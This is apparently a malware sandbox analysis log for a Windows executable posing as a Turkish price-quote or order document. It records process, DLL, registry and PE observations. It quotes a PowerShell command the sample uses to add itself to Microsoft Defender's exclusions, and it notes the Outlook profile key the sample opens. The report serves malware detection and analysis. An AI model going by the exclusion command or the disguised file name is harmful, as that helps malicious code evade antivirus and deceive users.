Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static file information: File size 1077248 > 1048576

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106400

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: JZPm.pdb source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe
Source:	Binary string: JZPm.pdbSHA256 source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A1C68 pushad ; ret	1_2_069A1C75
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A7528 pushfd ; ret	1_2_069A7535
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069A6D48 push esp; iretd	1_2_069A6D55
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_069AFA08 push es; iretd	1_2_069AFA7C
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A1B68E pushfd ; ret	1_2_06A1B68F
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A15277 pushfd ; iretd	1_2_06A15285
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A1780A push es; retn A176h	1_2_06A17730
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Code function: 1_2_06A904E8 push esp; ret	1_2_06A904E9

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Static PE information: section name: .text entropy: 7.386508416356192

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File created: \#u0130lc#u0130 hold#u0130ng a.s fiyati_teklif 017867sipari#u015fi jpeg doc .exe
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File created: \#u0130lc#u0130 hold#u0130ng a.s fiyati_teklif 017867sipari#u015fi jpeg doc .exe
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File created: \#u0130lc#u0130 hold#u0130ng a.s fiyati_teklif 017867sipari#u015fi jpeg doc .exe	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	File created: \#u0130lc#u0130 hold#u0130ng a.s fiyati_teklif 017867sipari#u015fi jpeg doc .exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
